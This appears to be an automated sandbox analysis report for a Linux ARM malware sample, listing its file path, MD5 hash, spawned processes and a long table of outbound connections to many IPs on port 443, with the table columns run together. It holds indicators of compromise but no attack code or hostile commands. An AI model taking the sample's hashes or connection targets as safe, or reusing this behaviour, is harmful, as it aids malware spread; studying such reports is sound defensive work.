                                    23655192.168.2.134061631.161.152.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23656192.168.2.1350806213.128.131.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23657192.168.2.1334552159.155.102.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23658192.168.2.133607862.164.197.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23659192.168.2.133882660.45.213.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23660192.168.2.1349712193.138.242.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23661192.168.2.133439648.160.91.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23662192.168.2.1350972173.171.206.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23663192.168.2.135615099.81.44.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23664192.168.2.1343698191.19.179.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23665192.168.2.1354814180.85.202.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23666192.168.2.136006873.210.196.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23667192.168.2.1343142116.1.218.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23668192.168.2.1350332191.199.51.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23669192.168.2.1352602164.54.2.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23670192.168.2.1348674190.132.186.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23671192.168.2.1335184162.167.210.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23672192.168.2.1338656148.14.23.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23673192.168.2.134032013.40.24.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23674192.168.2.1338256146.46.84.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23675192.168.2.1335104155.173.193.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23676192.168.2.1355960158.108.12.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23677192.168.2.1351360203.182.59.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23678192.168.2.135838878.175.164.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23679192.168.2.1343750213.95.140.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23680192.168.2.135952688.31.35.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23681192.168.2.135353881.29.72.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23682192.168.2.1340586207.117.196.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23683192.168.2.1340578180.147.82.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23684192.168.2.1334754148.174.34.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23685192.168.2.1351792194.67.69.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23686192.168.2.1358580163.229.101.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23687192.168.2.136025261.133.83.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23688192.168.2.1337490147.17.41.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23689192.168.2.134627477.255.117.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23690192.168.2.1338176189.113.34.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23691192.168.2.1341422206.219.104.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23692192.168.2.1335738223.36.237.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23693192.168.2.1334814101.90.15.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23694192.168.2.1334110171.136.48.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23695192.168.2.133664293.74.248.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23696192.168.2.1351106133.153.139.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23697192.168.2.1357580105.56.189.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23698192.168.2.135482423.28.44.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23699192.168.2.1355836196.105.27.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23700192.168.2.135075896.156.58.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23701192.168.2.1336000209.215.46.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23702192.168.2.1342398185.148.200.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23703192.168.2.1337528179.255.140.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23704192.168.2.133293414.91.145.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23705192.168.2.134037291.189.202.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23706192.168.2.13509665.229.142.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23707192.168.2.1338280162.74.76.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23708192.168.2.1353640126.28.196.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23709192.168.2.1337608152.123.215.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23710192.168.2.1344322112.238.47.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23711192.168.2.134053889.215.219.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23712192.168.2.13522809.158.2.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23713192.168.2.1350488171.106.74.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23714192.168.2.1341750135.42.251.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23715192.168.2.1345730172.190.150.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23716192.168.2.135374866.48.140.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23717192.168.2.1337822135.203.6.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23718192.168.2.135548086.154.77.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23719192.168.2.133516649.48.94.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23720192.168.2.135121877.11.139.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23721192.168.2.1345288169.30.176.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23722192.168.2.1358438135.14.57.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23723192.168.2.1333546197.177.6.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23724192.168.2.1354850218.221.231.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23725192.168.2.134271870.83.98.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23726192.168.2.1354424107.88.216.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23727192.168.2.135637466.237.235.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23728192.168.2.135018432.211.132.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23729192.168.2.1343466174.138.212.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23730192.168.2.134156498.244.22.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23731192.168.2.134176460.209.9.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23732192.168.2.135457078.151.60.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23733192.168.2.13499122.211.32.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23734192.168.2.1343142143.79.158.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23735192.168.2.1345486119.94.163.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23736192.168.2.134022864.28.211.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23737192.168.2.135263491.92.8.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23738192.168.2.1360696130.237.51.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23739192.168.2.135351691.149.240.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23740192.168.2.1349278212.222.69.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23741192.168.2.1354906217.210.11.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23742192.168.2.1347704165.85.196.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23743192.168.2.13562568.255.133.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23744192.168.2.1346640174.237.197.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23745192.168.2.136048476.187.125.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23746192.168.2.1356624154.3.5.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23747192.168.2.134799620.220.214.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23748192.168.2.1359372179.169.130.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23749192.168.2.135401249.193.124.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23750192.168.2.1342624112.106.62.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23751192.168.2.1349420116.217.233.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23752192.168.2.136098612.204.108.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23753192.168.2.1334708124.124.129.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23754192.168.2.1355900153.44.16.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23755192.168.2.1343136206.159.64.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23756192.168.2.133791294.130.164.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23757192.168.2.1359592100.242.26.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23758192.168.2.1347716159.139.193.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23759192.168.2.1358172102.187.121.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23760192.168.2.1338198223.93.237.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23761192.168.2.1334862148.10.48.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23762192.168.2.134491280.182.199.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23763192.168.2.134797048.159.42.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23764192.168.2.133453032.115.193.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23765192.168.2.136004286.175.166.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23766192.168.2.1343982109.107.165.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23767192.168.2.135644644.170.194.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23768192.168.2.1359646153.162.226.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23769192.168.2.1347824142.53.214.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23770192.168.2.135031486.142.51.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23771192.168.2.134598463.116.58.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23772192.168.2.1343456135.82.9.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23773192.168.2.1333292119.103.45.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23774192.168.2.1340324209.151.224.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23775192.168.2.13410425.127.141.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23776192.168.2.1343550167.9.128.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23777192.168.2.1333060157.57.80.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23778192.168.2.1355310143.254.30.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23779192.168.2.1347790139.206.40.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23780192.168.2.1352680145.242.63.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23781192.168.2.135590652.122.30.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23782192.168.2.133587049.98.36.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23783192.168.2.134502472.211.247.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23784192.168.2.1356616189.41.160.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23785192.168.2.1340928184.131.125.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23786192.168.2.1351422118.76.26.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23787192.168.2.1350580134.199.30.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23788192.168.2.135474454.104.67.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23789192.168.2.1345902176.136.31.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23790192.168.2.1340612100.53.97.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23791192.168.2.1350544193.90.240.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23792192.168.2.134721064.8.125.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23793192.168.2.133414895.29.154.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23794192.168.2.13463129.229.252.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23795192.168.2.133910875.179.137.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23796192.168.2.1334896187.83.132.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23797192.168.2.136074835.18.157.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23798192.168.2.134196474.243.86.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23799192.168.2.1353014172.195.15.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23800192.168.2.1358668158.181.248.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23801192.168.2.1356462129.58.210.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23802192.168.2.1338456132.6.110.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23803192.168.2.133743651.87.179.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23804192.168.2.1346530119.68.147.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23805192.168.2.1342680221.108.27.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23806192.168.2.1357496176.137.110.211443
                                    TimestampBytes transferredDirectionData


                                    System Behavior

                                    Start time (UTC):18:01:47
                                    Start date (UTC):13/01/2024
                                    Path:/tmp/skyljne.arm7-20240113-1800.elf
                                    Arguments:/tmp/skyljne.arm7-20240113-1800.elf
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):18:01:47
                                    Start date (UTC):13/01/2024
                                    Path:/tmp/skyljne.arm7-20240113-1800.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):18:01:47
                                    Start date (UTC):13/01/2024
                                    Path:/tmp/skyljne.arm7-20240113-1800.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):18:01:47
                                    Start date (UTC):13/01/2024
                                    Path:/tmp/skyljne.arm7-20240113-1800.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
                                    Start time (UTC):18:01:47
                                    Start date (UTC):13/01/2024
                                    Path:/tmp/skyljne.arm7-20240113-1800.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
                                    Start time (UTC):18:01:47
                                    Start date (UTC):13/01/2024
                                    Path:/tmp/skyljne.arm7-20240113-1800.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
                                    Start time (UTC):18:01:48
                                    Start date (UTC):13/01/2024
                                    Path:/usr/libexec/gnome-session-binary
                                    Arguments:-
                                    File size:334664 bytes
                                    MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                    Start time (UTC):18:01:48
                                    Start date (UTC):13/01/2024
                                    Path:/bin/sh
                                    Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
                                    File size:129816 bytes
                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                    Start time (UTC):18:01:48
                                    Start date (UTC):13/01/2024
                                    Path:/usr/libexec/gsd-print-notifications
                                    Arguments:/usr/libexec/gsd-print-notifications
                                    File size:51840 bytes
                                    MD5 hash:71539698aa691718cee775d6b9450ae2

                                    Start time (UTC):18:01:49
                                    Start date (UTC):13/01/2024
                                    Path:/usr/sbin/gdm3
                                    Arguments:-
                                    File size:453296 bytes
                                    MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                    Start time (UTC):18:01:49
                                    Start date (UTC):13/01/2024
                                    Path:/etc/gdm3/PrimeOff/Default
                                    Arguments:/etc/gdm3/PrimeOff/Default
                                    File size:129816 bytes
                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                    Start time (UTC):18:01:49
                                    Start date (UTC):13/01/2024
                                    Path:/usr/sbin/gdm3
                                    Arguments:-
                                    File size:453296 bytes
                                    MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                    Start time (UTC):18:01:49
                                    Start date (UTC):13/01/2024
                                    Path:/etc/gdm3/PrimeOff/Default
                                    Arguments:/etc/gdm3/PrimeOff/Default
                                    File size:129816 bytes
                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                    Start time (UTC):18:01:59
                                    Start date (UTC):13/01/2024
                                    Path:/usr/lib/systemd/systemd
                                    Arguments:-
                                    File size:1620224 bytes
                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                    Start time (UTC):18:01:59
                                    Start date (UTC):13/01/2024
                                    Path:/lib/systemd/systemd-user-runtime-dir
                                    Arguments:/lib/systemd/systemd-user-runtime-dir stop 127
                                    File size:22672 bytes
                                    MD5 hash:d55f4b0847f88131dbcfb07435178e54